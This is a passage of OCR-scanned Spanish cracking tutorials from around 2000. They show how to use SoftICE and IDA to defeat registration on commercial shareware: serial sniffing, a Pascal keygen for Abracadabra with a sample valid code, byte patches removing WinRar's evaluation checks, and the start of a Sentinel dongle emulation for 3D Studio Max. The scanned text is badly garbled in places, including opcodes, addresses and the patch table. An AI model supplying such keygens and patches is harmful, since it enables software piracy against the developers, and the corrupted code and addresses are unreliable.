eliminala para volver a estar como antes (si queres antes de borrarla , hace click en archivo y exportala ). Al comenzar decíamos que se podía 
hacer mas rápido solo con Soft-Ice, vamos a ver si es verdad. 


Hasta ahora lo único que hemos hecho con el Soft-Ice era arribar a posiciones de memoria específicas previamente analizadas con el 
WD32DSM. Ahora haremos algo distinto. Volvemos a cargar nuestros datos (los falsos ) en el programa y 'Control-D" mediante pondremos 
un bpxhmemcpy en el Soft-Ice. Bpxhmemcpy tiene un pro y una contra. El pro es que entra sin problemas en casi todos los 
programas, la contra es que no entra en un lugar específico por lo que tendremos que buscar un poco. Hecho 
esto pulsamos aceptar y entramos en el Soft-Ice. Pero como decíamos estamos en el 'user' (como se puede ver en la línea verde inferior ). 
Desactivamos el breakpoint con bc* . Vamos pulsando F'12 (esto es viajar de ret en ret) y vamos mirando en que lugar del programa estamos. 
Luego de pulsar F12 siete veces arribamos a cdp!code . Y ahora que ???. Seguimos pulsando F12 hasta ver algo interesante ( call, test, cmp 
seguidos de un salto condicionado ) o bien vamos contando cuantas F12's oprimimos hasta pasarnos y que aparezca el mensaje de error,hecho 
esto volvemos a hacer lo mismo pero apretando F12 una vez menos.  Mmmmmm....me parece que lo explique en japonés ;-). Hagámoslo 
juntos. Ponemos nuestros datos, ponemos el breakpoint y pulsamos aceptar. Entramos en el Soft-Ice. Borramos el breakpoint con bc*. 
Oprimimos F12 siete veces y llegamos a cdp!code. Una vez allí si oprimimos F12 seis veces más nos aparece el mensaje de error. Por lo que 
repetiremos lo anterior pero pulsando F12 solo cinco veces más. Hecho esto aparecemos en: 


0167:0045A41B E314F1FCFF CALL 00429534 (ver 2* gráfico WD32DSM) 


A partir de allí trazamos con F10 y nos fijamos que hay en los regitros . Al llegar a 0167:0045A444 vemos el serial correcto. Sin duda fue 
mucho más simple. 


Ahora sí, por fín, la tan esperada y nunca bien ponderada sección (¿?) ahora te toca a vos. En la misma dirección donde bajaste este 
programa, podrás bajarte ' INFOTEL 3.10 '. Con Soft-Ice poniendo un bpx hmemcpy tendrás que encontrar el serial correcto. 


Por dudas o comentarios comunicate a http://yerbamatearO yahoo.com 


Espero que este tutorial te haya sido útil, nos vemos en el próximo 


Yerba Mate 


* Todo es fácil cuando se sabe como" 


IMPORTANTE: Lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, NO como robar alguna propiedad. 
Si vas a usar estos programas debes comprarlos 
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Karpoff Spanish Tutor 


Programa: Abracadabra 1.2.6 (28.07.99) 
Otra aproximación 


PROTECCION: Name / Serial 
Descripcion: Un original 'explorer' para Windows 
Dificultad: Principiante 


DOWNLOAD: http://www. lighttek.com 
Herramientas: Softice 
CRACKER: MeGaBiTe FECHA: 22/09/ 2000 


INTRODUCCION 


Bueno el propósito de éste tutorial es profundizar un poco más en otro tutorial publicado en éste site: 
el del día 07/09/2000 escrito por 'Riverwind'. Pudiéramos decir que es su continuación natural. Dicho 
tutorial se limita a 'olisquear' un Serial Number; en éste vamos a intentar crear un Key Generator. 
Por lo demás es harto sencillo. ¡Nada del otro mundo! 


El programa, por su parte, es una especie de Explorer muy 'sui generis'. Quiero decir que es un poco 
rarillo. En uno de los laterales, ya que esto es configurable, aparece el típico árbol de directorio y en 
el lado contrario se van visualizando los ficheros; si pinchamos en un ejecutable, lo ejecuta; si lo 
hacemos en un fichero de texto, visualiza el texto (si es un documento Word, pues lo mismo, para él 
sigue siendo texto), si es una imágen, la muestra y si se encuentra con cualquier otro tipo de fichero 
más extraño, simplemente lo muestra ¡En fin! ¡Cosas veredes buen Sancho ...! 


AL ATAKE 


Bueno, nosotros a lo nuestro. Como se indicaba en el tutorial de 'Riverwind' la protección consiste en un 
'Name' y un 'Registration Code' que se nos exigen tanto al arrancar la aplicación como en el momento de su 
descarga. Nos muestra la siguiente pantallita: 


Abracadabra is "Shareware". This means that we 
have made the software available to you for free 
evaluation. You are entitled to evaluate the software 
for up to 30 days without obligation to pay. 


After 30 days. if you decide to keep the software, 
you must register your copy for a small fee. 


HAnw to register? 


First step: Payment via Internet or other ways (see 
readme.bd): 


Online Registration 


Second step: When you receive your registration 
code from author, enter name and code in fields: 


Name: 


Remind me later 


Bien, vamos a introducir algo a ver qué pasa. Ponemos 'MeGaBiTe' como 'Name' y 'u1193046' y pulsamos el 
botón 'Ok'. ¡Coño! ¡Miren lo que nos dice! 


¡Vaya! Podemos deducir de aquí que se espera que el 'Registration Code' sea un entero. Bueno, bien está si 
así os place. Vamos a introducir un entero. Ponemos 'MeGaBiTe' como 'Name' y '1193046' como 'Registration 
Code' y nuevamente pulsamos el botón 'Ok'. ¡Ahora aparece el mensaje de error! Esta es la pantalla: 


Invalide registration name or code. Try again. 


Bien, seamos obedientes y sigamos su consejo: intentémoslo de nuevo. Volvemos a introducir la información 
anterior pero ésta vez antes de pinchar en el botón 'Ok' vamos a poner un breakpoint en la función API 
'hMemCpy". Para ello lanzamos en primer lugar nuestro queridísimo Softl CE pulsando Ctrl-D y escribimos 
"BPX HMEMCPY". Después pulsamos F5 y volveremos a la pantalla del programa. Ahora ya estamos listos 
para pinchar en el botón 'Ok'.Bien, ¡vamos allá! 


Softl CE hará break. Comoquiera que se llama cuatro veces a la función 'hKMemCpy' tendremos que pulsar F5 
tres veces y después pulsar F12 hasta que lleguemos al módulo del programa. SoftlCE nos indica qué módulo 
se está ejecutando mostrándonos su nombre en la parte superior de la ventana Command. En el caso que nos 
ocupa tendremos que ver lo siguiente: 


ABRA!CODE+0006D741 


Bien. Una vez veamos ésto, nos encontraremos con el siguiente trozo de código: 


0177:0046E741 CALL 004226E4 

0177:0046E746 XOR ESI,ESI >Aterrizamos aquí 

0177:0046E748 MOV EAX, [EBP-08] >Pone nuestro Name en EAX 

0177:0046E74B CALL 00403C0C >Calcula la longitud del Name 
0177:0046E750 TEST EAX,EAX >Comprueba que hayamos puesto algo en Name 
0177:0046E752 JLE 0046E767 >Si no hemos puesto nada, salta 


Bueno con éstas líneas lo que se está comprobando es que hayamos introducido un Name. Si no hemos 
introducido ninguno se producirá un salto. Como ése no va a ser nuestro caso, puesto que queremos 
registrarnos con nuestro Name, seguimos. Ahora nos cruzamos con éste otro trozo de código: 


0177:0046E759 MOV ECX, [EBP-08] >Se pon 1 Nam n ECX y se 
>inicia el bucle que calcula el 
>Serial Number 
0177:0046E75C MOVZX ECX,BYTE PTR [EDX+ECX-01] >El byte al que apunta la 
>dirección [EDX+ECX-01] es 
>el primer carácter de 
>nuestro Name; después se 
>incrementa pasando al 
>siguiente, etc 


0177:0046E761 ADD ESI,ECX >ESI actúa de sumatorio de los 
>valores ASCII de los distintos 
>caracteres que componen el Name 

0177:0046E763 INC EDX >Incrementa el índice 

0177:0046E764 DEC EAX >EAX contiene la longitud de 
>nuestro Name; se decrementa 

0177:0046E765 JNZ 0046E759 >¿Hemos llegado al final del Name? 
>Si no es así, se reinicia el bucle 

0177:0046E767 MOV [EBP-14],ESI >Mueve el sumatorio a [EBP-14], lo 


>cual machaca nuestro Registration 
>Code que estaba guardado allí. No 
>tiene importancia, el programa 
>también lo tiene guardado en 
>[EBP-04] como se verá después 

0177:0046E76A FILD DWORD PTR [EBP-14] >Convierte el entero en un número 

>real 

0177:0046E76D CALL 004029FC >Esta función devuelve el sumatorio 

>que antes teníamos guardado en ESI 

>en el registro EAX 

0177:0046E772 IMUL EAX,EAX,000007B2 >Aquí está la madre del cordero; 
>multiplica nuestro sumatorio por 
>la constante '7B2' (hexadecimal, 
>por supuesto) lo cual dá como 
>resultado el Registration Code 


>auténtico 
0177:0046E778 MOV ESI,EAX >Guarda el resultado de la 
>multiplicación en el registro ESI 
0177:0046E77A CMP ESI, [EBP-04] >Y lo compara con lo que tenemos en 


>la dirección apuntada por [EBP-04] 
>que, como decíamos antes, también 
>contiene nuestro Registration Code 


>falso 
0177:0046E77D JNZ 0046E88C >El salto 'buen chico/mal chico' 


Bueno, parece que todo está bastante claro. Y bastante sencillo. Lo único que tenemos que hacer es saber 
cuál es el valor guardado en el registro ESI cuando lleguemos a la instrucción guardada en la posición 
'0046E77A'. Para ello, sencillamente, en la ventana Command de Softl CE escribimos: '? ESI', y ¡ya está! Por 
si alguien siente curiosidad el Registration Code para mi Name (recuerde, 'MeGaBiTe') es '1382940'. ¡Por 
favor, no use el mío! Sea un poco aplicado y obtenga el suyo propio. Una vez registrado el programa guarda 
los datos en la siguiente clave del registro de Windows: 


HKEY_CURRENT_USERSoftwarelLighttekl Abracadabra 


Esta 'key' tiene dos entradas: 'usercode' y 'usename*. Con eliminar el valor de ésta última entrada el 
programa volverá a su estatus de 'unregistered!. 


Como se puede ver el código es harto simple. Se van sumando los valores ASCII de todos los caracteres de 
nuestro Name y el resultado de dicha suma se multiplica por la constante '7B2' hexadecimal y, ¡¡LISTO!! 


Ahora vamos a escribir un pequeño KeyGen. Aquí tenemos el código escrito en Pascal. 


Program abraKG; 
Uses Crt; 


Var nombre : String[20]; 


3 : byte; 
serial : longlnt; 
Begin 


ClrScr;TextColor (White) ;¡Write('Key Generator by '); 
TextColor (LightRed) ¿¡Write('MeG');TextColor (Yellow); 
Write('aB');TextColor (LightRed) ¿¡Writeln('iTe'); 
TextColor (15);¿writeln('Abracadabra v1.2.6');¡Writeln; 
TextColor (7) ;Write('Introduzca su nombre: '); 
TextColor (15) ;ReadLn (nombre) ; 
for i := 0 to length(nombre)-1 do 

begin 

serial := serial+ord(nombre[i+1]) 

end; 
serial := serial*$7B2; 
TextColor (7); 
write('Su Registration Code: '); 
TextColor(15);Write (serial); 
ReadKey 
End. 


¡Bueno! Esto es todo, amigos. Hasta el próximo tutorial. 


Y, para quienes todavía sean reticentes a escribir y compilar éste código, aquí tenemos éste sencillo formulario: simplemente 
basta con pulsar en el botor 'Generar". 


Nombre de usuario: 
Registration Code: [>] 


Generar Registration Code 


Me gustaría saludar a mis crackers favoritos y de los que más he aprendido. 


Son éstos: Torntdo, The SandMan, BalckB, +Fravia, TNT!, ECD, Karpof, Wkt. Esto no quiere decir que no haya otros 
extraordinarios crackers. 


NOTA: Si le gusta el programa, cómprelo. Los programadores pierden demasiado tiempo desarrollando su software como 
para que vengamos nosotros y no les compensemos por su trabajo. ¡No es justo! 


Ensayo por: MeGaBiTe 
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Programa: Easy CD-DA Extractor 3.0.6 


PROTECCION: O e e 
Descripcion: Transforma pistas de audio a varios formatos (mp3, wav, wma ....) 
Dificultad: | Principiante 

DOWNLOAD : A 
Herramientas: | Softice v4x 

ra AP FECHA: [22/09/2000 


INTRODUCCION 


Este programa es muy útil para pasar CD audio a ficheros comprimidos mp3, destinado a 
ahorrar espacio ya que se puede grabar 7 cds en 1 solo, bueno vosotros ya le 
buscareis el uso. 

El estudio de este programa se va a enfocar en el método denominado por el maestro 
+ORC, "memory echo trick", traducido, algo asi como el truco del eco en la 

memoria... 


| AL ATAKE 


Se debe se seguir estos para que salga bien: 


1- Al cargar el programa sale que no estamos registrados, nos da un tiempo limitado del uso 
del programa y la posibilidad de registrarlo, mediante nombre y serial. 


2- Tenemos, ahora que introducir un nombre y un serial cualquiera. Nos da el mensaje de 
error. 


3- Cargamos el Soft-Ice, hacemos un breakpoint: bpx hmemcpy ( el mejor ). 


4- En el programa Easy CD-DA Extractor, volvemos a intentar registrarnos, le damos a aceptar 
para que compruebe el serial, pero CUIDADO debe tener EL MISMO NOMBRE QUE ANTES !!!!!!! 
Rapidamente saltamos en el SI, lo que tenemos que hacer es ir ahora al programa objetivo, le 
damos repetidamente a F12 hasta llegar a: 

asy..! ( o algo asi, vosotros ya lo vereis ) 


5- Ahora es donde realmente viene el truco: en vez de ponernos y haber donde salta como se 
compara en serial y todo eso, vemos si hay algun rastro en la memoria de nuestro nombre 
introducido y nuestro serial chungo: 

La función a usar en el SI : s 30 1 ff£ffffff "xxxxx" ¿donde xxXXxXxXxX es el nombre usado. 

Al darle al enter, nos da resultado y vemos: 

NUESTRO NOMBRE 

NUESTRO SERIAL CHUNGO 

¿SERIAL CORRECTO? =====>> algo que empieza por EZCDDAX3-........ algo sospechoso, no? ;-) 

Si esto no os sale, buscar más veces en la memoria con el comando: s ¿en el SI, hasta que os 


aparezca. 


6- El serial encontrado, será el correcto?, ponemos el mismo nombre de siempre, y con el 
serial encontrado. Al hacerlo el programa no nos da las gracias ni nada, pero cuando salimos 
del programa y lo volvemos a cargar, no nos sale nada de introducir serial, ni de limite de 
tiempo =>ESTAMOS REGISTRADOS. 


NOTA 1: Primero decir que esto es para el estudio de la protección del programa, para poder 
evaluarlo mejor, y que si os gusta, debeis comprarlo! ;-) 


NOTA 2: Debeis seguir los pasos, de 1% introducir nombre y que nos de el error, y 2%, cuando 
hacemos el bpx debe ser con el mismo nombre también, ya que si no esto no sale. 


sobre 
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Programa: WinRar 2.70 beta 1 


PROTECCION: Archivo LLave 


Descripcion: Utilidad Compresion. 
Dificultad: Aficionado 
DOWNLOAD : cualquier pagina de shareware 


Herramientas: Softlce 3+, IDA Pro, Hacker"s View 


CRACKER: 'VIPER | FECHA: 22/09/2000 


INTRODUCCION 


Tras un pequeño lapso en mi produccción de tutoriales (debido a mi ocupación en file 
insPEctor) vuelvo a la carga con un programa mas bien poco dificultoso, pero que 
encierra en si algunas peculiaridades que merecen la creación de un tutorial. Sin mas 
preámbulos pasemos a meternos manos a la obra. 


AL ATAKE 


Para comenzar con la tarea empezaremos revisando la información que contiene la cabezera del 
ejecutable, y que mejor programa para esta tarea que mi flamante file insPEctor 2.0. Veamos 
los resultados obtenidos: 


eN file insPEctor 2.0 


á Herramientas | Acerca de... | 


Reconocimiento de signaturas 


Compilador; Borland C++ for Win32 1995 (1) 
Packer: No encontrado 


Encriptador: No encontrado 


Versión de la librería: fi 0 Información... 


Versión del enlazador: [2.25 Versión de la imágen: fo.o 
Versión del SO; [a 0 Versión del Subsistema: fa.o 


(3 Abrir archivo Ey Analizar (J Salir 


[C:iqUtilidadyWinRar|WinRAR .exe 


Pues bien, la sección que nos importa de la valiosa información que muestra file insPEctor 
es la de reconocimiento de signaturas, que nos revela con que ha sido compilado o procesado 
nuestro objetivo, como veis el resultado es totalmente inofensivo: Borland C++. 


Por el momento las cosas no se complican demasiado, no hay ningún empaquetador presente, lo 
que evita tener que llevar a cabo procesos de desempacado o la creación de cargadores. 


Primer ataque 


En contra de lo que muchos piensan, el primer ataque no se hace ni con Softlce no con IDA, 
sino simplemente cargando el programa, analizando su protección y buscando puntos de ataque. 
En este aspecto WinRar nos obsequia con un sistema basado en un archivo llave, cuya 
presencia en la carpeta del programa desbloguea todas las funcionalidades del programa y 
elimina las nags. Podemos confirmar esto mediante dos características del programa: 

1.- El programa puede registrarse pero no hay código de desbloqueo ni nada parecido. 

2.- Si monitorizamos con FileMonitor descubrimos que se busca un archivo llamado rarreg.key. 
Pero sii hay algo que llama la atención en este programa es la frase que se encuentra junto 
al nombre en la barra de título: 


'¡=Archivos de programa - WinRAR (evaluation copy) 
File Commands History Favorites Options Help 


Pues si, esa va a ser nuestra llave de acceso a los entresijos de la protección de este 
programa, así que ha llegado la hora de usar una de mis herramientas favoritas: IDA Pro. 


Una vez desensamblado el programa en cuestión vamos al diálgo que contiene las cadenas y 
buscamos... un momento, si nos fijamos la barra de título contiene una peculiaridad: primero 
se muestra el nombre del directorio que exploramos, luego el nombre del programa y 
finalmente el fatídico "(evaluation copy)"; todo esto nos obliga a buscar la siguiente 
cadena: 


$s -= Winrar 
Donde %s contiene el directorio que WinRar decide que ha de mostrarse... exacto!, hemos 


encontrado justo esa referencia, veamos a donde nos conduce... 


0041B930 push eax 

0041B931 push offset aSWinrar ; "Ss — WinRAR" 
0041B936 lea edx, [ebp+var_200] 

0041B93C push edx 

0041B93D call _sprintf 


0041B942 add esp, 0Ch 

0041B945 cmp byte ptr ds:dword_465CAC, O 
0041B94C jnz short loc_41B97C 

0041B94E push 369%h 

0041B953 call sub_4080CC 

0041B958 push eax 

0041B959 push offset aS_7 ; " (%Ss)" 
0041B95E lea ecx, [ebp+var_200] 

0041B964 push ecx 

0041B965 call _strlen 


Oooops!, tenemos aquí varias líneas muy sospechosas. Si analizamos la ejecución de estas 
pocas líneas veremos que primero se concatenan el nombre del directorio y el " -— WinRar", 
pero luego un salto condicional decide si tiene o no que agragarse el "(evaluation 
version)". Pero bien, ¿que condiciona ese salto?, pues un byte (en el offset 465CAC) que 
continene 0 si no estamos registrados y 1 si lo estamos... lo que el programador ha hecho es 
algo tan sencillo como esto: 


bool EstaRegistrado = false; 
if (ComprubaSiEstaRegistrado (void) == true) then (EstaRegistrado = true) else 
[EstaRegistrado = false); 


if (!EstaRegistrado) then (MuestraNag (void) ); 


Bueno, quizás esta penosa demostración de mis patéticos conocimientos de C haya ilustrado lo 
que el programador ha llevado a cabo a la hora crear un sistema de registro para WinRar. 
Pero todavía queda por hacer, que nadie se duerma en los laureles. 


La técnica a usar para anaiquilar estos esquemas de protección es muy sencilla: simplemente 
hay que usar el comando bpm de Softlce. Con este comando Softlce se detendrá al detectar un 
acceso de lectura o escritura en la dirección especificada, veamos la sintaxis: 

bpm 465CAC W 


Solo puntualizar que la W especifica que solo se monitorizen las escrituras en esa 
dirección, y no las lecturas. 


Falseando variables 


Abrimos el loader del SoftlIce, cargamos WinRar y cuando se detenga al inicio del programa 
escribimos el breakpoint anteriormente citado, tras lo cual dejamos correr el programa, y 
SoftlIce se detiene en: 

00426195 push 0 

00426197 call sub_43BC98 

0042619C mov byte ptr ds:dword_465CAC, al 

004261A1 push ebx 


En mi opinión, lo mas correcto sería insertar un "mov al, 1" en 00426195, rellenar con nop's 
los 5 siguientes bytes hasta eliminar por completo la llamada que se hace. De esta forma 
siempre se moverá a esta posición de memoria un 1 (el valor que nos interesa...). 


Así que ponemos un breakpoint en 00426195, reiniciamos el programa e introducimos los 
opcodes ya mencionados. Dejamos al programa correr y nos encontramos con otro intento de 
modificar nuestra variable salvadora... el procedimiento a seguir es exáctamente el mismo, 
con la peculiaridad de que ahora hay que poner un breakpoint antes de la llamada, reiniciar, 
volver a modificar el primer chequeo y parchear el 


2% también (el cual no se ejecutará si el primero falla). Tras este lio de breakpoints 
continuamos con la ejecución todo parece ir de perlas, pero si seleccionamos un archivo 
pulsamos el botón ADD caemos en un tercer intento de jodernos, pero ahora con otro esquema: 


0040EF08 cmp byte ptr ds:dword_465CAC, 0 
0040EFOF 3jz short loc_40EF21 

0040EF11 cmp ds:byte_478284, O 

0040EF18 jnz short loc_40EF21 

0040EF1A mov byte ptr ds:dword_465CAC, 0 


0EF21 mov ds:dword_4700C4, 1 
O0EF2B cmp ds:byte_4700B6, 0 
0040EF32 3jz short loc_40EF58 
0EF34 push 0 

0EF36 push 73h 


Si se traza con Softlce es bastante sencillo darse cuenta de que todo el tomate está en 
0040EF18, que puede y debe ser sobreescrito con un jmp 40EF21. Por el momento fin de la 
historia..... 


Y digo por el momento por que este programa incluye una peculiar opción, que no es ni mas ni 
menos que "Put Authenticity Verification". Esta opción está en el menú de ADD y añade al 
archivo el nombre del usuario registrado para fines que yo, al menos, desconozco. 


Pues bien, al comprimir un archivo usando esta opción todo va de maravilla, hasta que 
decidimos descomprimirlo, donde recibimos un mensaje que dice algo así como "Authenticiti 
Verification Failed"... evidente!, ya que si vamos al manú About nos encontramos con la 
frase "Registered to ". Esto quiere decir que el programa busca una AV inexistente, lo que 
produce un ERROR. 


Mi solución (mas bien chapuza) para solucionar esto es eliminar esta opción usando Resource 
Hacker o bien atacando la cabezera de recursos directamente si se tiene habilidad 
suficiente. La primera opción es realmente sencilla y no merece la pena comentarla, solo 
puntualizar que para que todo funcione, hay que eliminar por completo el control, nada de 
ocultarlo o desactivarlo. 


Resumiendo 


Para finalizar aquí va una tabla con todos los puntos del programa a modificar, para 
disuadir posibles dudas... 


Dirección Original Crackeado 
(00426195 GAOOESFCSAOIOO  BOOI9O9099090 
10041AB82 6A 01 E8 OF 11 02 00 ¡BO 01 90 90 90 90 90 

DOADEF1E Ig ESOO 


Bueno, pues ya solo queda usar Hackers View o cualquier editor hexadecimal para modificar 
los bytes pertinentes. Espero que nadie se limite simplemente a mirar esta tabla y crackear 
el programa sin prestar atención al tutorial en si... 


Pues bien, aquí termina este corto pero intenso tutorial sobre una herramienta interesante 
tanto desde el punto de vista del usuario como del cracker. Espero que este documento sirva 
de ayuda al mayor número de crackers posible y despeje cualquier duda sobre la protección de 
este afamado programa. 

A continuación unos cuantos enlaces que seguro ayudarán a completar este tutrorial con 
éxito: 


Página oficial del grupo K-FoR: http://pagina.de/kfor 


Página oficial de file insPEctor: http://www.inicia.es/de/viper/finspec.htm 


Mi dirección de E-Mail: viper167ftelepolis.com 


"Carga las pistolas y trae a tus amigos 
Es divertido perder y disimular" 
(Smells like teen spirit - Nevermind - Nirvana) 


sobre 
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3D Mark99 Max Pro 


PROTECCION: 
Descripcion: Utileria Grafica 


Dificultad: Principiante 


DOWNLOAD: http://www.ktx.com 


Herramientas: Softice v3x 


Kamui 02/10/2000 


INTRODUCCION 


Es una utilidad para comprobar cómo nos funcionan las tarjetas gráficas para los juegos. 


AL ATAKE 


1- Al ejecutar el programa vemos que es una versión con límite de tiempo, pero que 
nos da la posibilidad de registrarlo. 


2- Cargado el SI, ejecutamos el programa objetivo, y hacemos un breakpoint: 
bpx getwindowtexta 


Introducimos un nombre y un serial cualquiera. Cuando le damos a registrarnos, 
saltamos en SI otra vez, con F5 y F12 llegamos hasta: 


Traceamos con F10 hasta llegar a la cadena principal. 
3- Podemos ver la siguiente cadena: 
40b87c 7474 3z 0040b8£2 


40b87e 83£f811 cmp EAX,11 => compara n”* de caracteres del serial chungo, serial 
valido 


40b881 741b jz 0040b%e => no salta y nos lleva al error 


40b883 6a00 push 00 


40b897 e85a9d0900 call 004%a55f6 => esta es la llamada al error. 
4- Ahora podemos ver qué ha comparado: 


? EAX => SI nos dice que es el n* de caracteres del serial que nosotros hemos 
introducido. 


? 11 => en decimal es 17, que son los caracteres del codigo real. 


Volvemos a introducir un nombre un codigo de 17 caracteres. Vemos que ahora el 
salto de 40b881 no se produce. 


5- Explorando podemos ver que hay 3 llamadas antes de la llamada al error. Primero 
podemos rastrearlas para ver qué hay: 


5.1- 40b8%e call 00469e30 ---> podemos ver nuestro codigo chungo comparandolo con 
otros seriales, serán una lista de seriales blacklisteados? 


5.2- 40b8af call 00469e80 ---> parece que no hay nada importante. 
5.3- 40b896 call 004572d0 ---> parece que tampoco hay nada importante. 


Deberiamos inspeccionar las llamadas que hay dentro de las llamadas pero tampoco 
hay nada... 


6-Vemos que en la Cadena principal existen comparaciones y saltos condicionales: 
40b8a3 3c01 cmp al,01 


40b8a5 “5dc jnz 0040b883 => no salta, pero si lo cambiamos nos lleva al error. 


Existen más: 
40b8ba 3ad3 cmp dl,b1l 


40b8bc 751le jnz 0040b8dc ---> salto obligado que nos lleva al error (a la cadena 
principal) 


40b8be 84c9 test cl,cl 


40b8c0 7416 3nz 0040b8d8 


Si cambiamos estos dos saltos, nos da el mensaje de gracias por registrarnos, PERO 
como tiene un chequeo previo , al arrancar el programa estamos otra vez sin 
registrar. 


¿Dónde puede estar el salto que nos lleve al éxito ? Pues, estará dentro de una 
llamada que nos envie a otra parte. En la 2* call podemos ver unos saltos que no se 
ejecutan cuando se comparan dos valores: y existe un salto importante: 


40b8ac 887760 mov esi, [edi+60] 


40b8af e8cce50500 call 00469e80 -—-—->entrando debemos pasar un loop que hay (para 
salir más rapidamente g 469f2d ), vemos: 


469f£2b 3beb cmp ebp, ebx 


469f£2d 7432 jz 00469f61 --->NO salta, este salto es importante, al invertirlo 
saltamos a otro sitio que al tracear con F10 vemos que entramos en un loop 
(generando el codigo?), "escapamos" de él con g 469f92. Al salir vemos: 


469f90 72d9 3Jb 00469f6b ---> fin del loop, nos manda al ppio de éste. 
469f92 6a05 push 05 


469f94 8d4c2414 lea ecx, [esp+14] 


469198 


469199 


469f9e 


BUENO; 
serial 


NOTA 1: 


51 push ecx => n” de 15 caracteres ? falta algo 


684ce54d00 push 004de54c ===>SERIAL CORRECTO <=== 
ff£1500184b00 call [004b1800] 


pues nos ha costado mucho trabajo pero al fin hemos conseguido encontrar el 


valido (algo así como XXXXX-XXXXX-XXXXX), pero ha merecido la pena, no? ;-). 


Primero decir que esto es para el estudio de la protección del programa, 


para poder evaluarlo mejor, y que si os gusta,debeis comprarlo! ;-) 


NOTA 2 


Si teneis alguna duda o sugerencia o crítica, no se, lo que querais, 


hacermela saber, porfa... kamui_flatinmail.com. 
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Programa: 3D Studio Max R2.5 y PRAREUEO MAR ADE y VOsL SERSUMAS RGSCRIcS- 1 —-Resumen didáctico 


INTRODUCCION 


Este resumen didáctico, una vez censurado en Febrero por el intolerante BSA, 
decidí correr el riesgo de actualizarlo y publicarlo de nuevo; si, por parte de 
AutoDesk, recibo una petición justificada para "bombardear con plutonio" este 
documento, lo haré desaparecer sin rechistar ( existen varios crakcs para el 3DSMax 
v3.1, es decir que este documento no perjudica a nadie. 

El mejor que he encontrado es el de Harvest, de mi ex-colega en SIEGE Kashmir; el 
peor el de DOD, que mejor olvidar). 

Veremos a partir de esta discusión, en cuanto a la protección de v3.1, que 
AutoDesk ha aprendido realmente mucho desde el triste intento para proteger 

R2.5, sin embargo, lamentablemente, lo que de hecho falla en esta protección 

es la vulnerabilidad intrínseca del propio Centinela, aunque Kinetix pudiera en 
cierto modo asumir parte de culpa ( véase las pruebas del CRC más adelante). 


AL ATAKE 


Empezaremos fijándonos en la protección del InatallShield, un Secuencial + de 
formato 3-8 y una Clave-CD. 


Todos los cuadros de entrada aceptan entradas de extensión fija, si observamos 
el directorio provisional de InstallShield, se muestran unos pocos dll, aunque, 
verdad, únicamente Identify.dll destaca ( InstUtil.dll es como si fuera una 
instalación utilidad dll y a 4,5 K tiene una capacidad demasiado escasa para 
almacenar una protección significativa, Browse.dll y Regplugs.dll también se 
han descartado con facilidad). 
Mirando atentamente entre las exportaciones y descompilando el guión encon- 
traremos que Identify.ValidateKeyWithPrefix() es la función que hay que ana- 
lizar; se puede verificar que modificando un 1 en EAX cuando regresa, permite 
que la instalación prosiga. 


Únicamente le di una lijera ojeada a cómo se ejecuta esta función, es bastante 
simple, con una tabla y algunas operaciones aritméticas básicas y un único XOR 
Lo que es pesado del esquema es lograr entender qué posiciones del Número 

de Serie generan la correspondiente Clave CD (es fácil encontrar la Clave 
correcta si se compara co la compensación 0x2651). 

Más tarde se comprobará que el propio 3DSMax comprueba que los tres 

primeros digitos del Número de Serie son 110, el resto puede completarse 
libremente ( rango 00000000-99999999), con lo que un ejemplo seria el 

Numero de Serie 110-99999999, Clave CD 2 SERVD, la idea es esta, 

aún así, vamos a instalarlo. 


A continuación, cargaremos 3dsmax.exe en IDA ( si realmente de desea guardar 
cierta firma de aplicación de búsqueda FLIRT Centinela de Killer_3K), lo que 

se verá es que la protección se basa en sproFindFirstUnit (), sproRead() y 
sproQuery(), el uso de la consulta es nuevo. 

Lo primero que se debe hacer es modicar sproFindFirstUnit( sub_5D8B61), lo 

que resulta muy fácil y propongo no describirlo. 

Lo siguiente que hay que encontrar es el código de Autorización correcto, tarea 
bastante trivial, 5D2251 comprueba la extensión (8) y 5D2497 realiza la com- 
paración efectiva, en mi ejemplo anterior el código es B63A197B. 


sproRead (_5D8D30 ) tiene dos referencias, Cada vez que se pone a O la 
dirección de lectura (es decir la mochila ID), lo mismo ocurre con R2.5; no 
podría obtenerse esto si se ejecutara con el funcionamiento normal de 3DSMax, 
estoy convencido que se suministra como una interfaz de activadores de 
conexión. 

Por si acaso, si se reescribiera sproRead(), debería colocarse un bpx en 
sproQuery (_5D9120) sin embargo, tomaría un tiempo hacerlo funcionar. 

Dado que no hay forma de saber exactamente qué respuesta de consulta debería 
ser, reescribiremos sproQuery para devolver al menos una cadena que se podrá 


reconocer: 

:005D9142 JZ 005D9144 <--- A nuestra Rutina 

:005D9144 PUSH EBP <---= Guardar EBP 

:005D9145 MOV EAX, [ESP+18]<---—-Colocar un número de bytes 

en la cadena de consulta 

:005D9149 XCHG ECX, EAX <--— en ECX 

:005D914A CALL $+5 ¿====== Set up delta 

:005D914F POP EBP <K===== Delta. 

:005D9150 LEA ESI, [EBP+12] <-—-Iniciar el retorno de consulta 
(máx. 56 bytes). 

:005D9153 MOV EDI, [ESP+20] <-—-Lugar de almacenamiento. 

:005D9157 REPZ MOVSB <---—Move. 

:005D9159 XCHG ECX, EAX <-—-Reiniciar ECX y eliminar EAX. 

:005D915A POP EBP <-- Required: 

db 56 dup (0) <-—-—Respuesta de consulta simulada. 


Tal como verá en SoftICE, únicamente se han verificado 4 bytes de la respuesta 
a la consulta a través de strcmp() en 0046F65A, las cadenas de consulta, no 
obstante, no son las mismas en cada ocasión. 

De hecho, es mucho más complicado puesto que esta área de códigos se 

comprueba a través de CRC desde distintas ubicaciones, a continuación presen- 
taremos una de estas comprobaciones: 


:00431058 MOV ESI, 0046F190 <-—-—Empezamos desde aqui 


:0043105D XOR EAX, EAX <-—-—Eliminar EAX. 

:0043105F CMP ESI, 0046F900 <-—-check till here (comprobacion) 
:0043106A MOV ECX, 0046F190 

:00431071 XOR EDX, EDX <------ Borrar EDX. 

:00431073 MOV DL, [ECX] <----Colocar Byte [ECX]. 

:00431075 INC ECX <--—-—Incrementar ECX. 

:00431076 CMP ECX, <--—Comprobacion 

:0043107€C NOT EDX <--—- EDX is checksum. 

:00431082 JB 00431071 

:00431084 SUB EAX, [006298A4] <--- Deberia ser 0. 


Si se ajustara strcmp() se plantearían problemas en todas las comprobaciones 
CRC y "esto es malo, muy malo" ( Según el estilo de Rainman, si se ha visto 
la película de Dustin Hoffman). 

Tampoco es practico sentanse y esperar, o intentar buscar todas las compro- 
baciones. Por el contrario, modificaremos nuestro codigo de emulación 
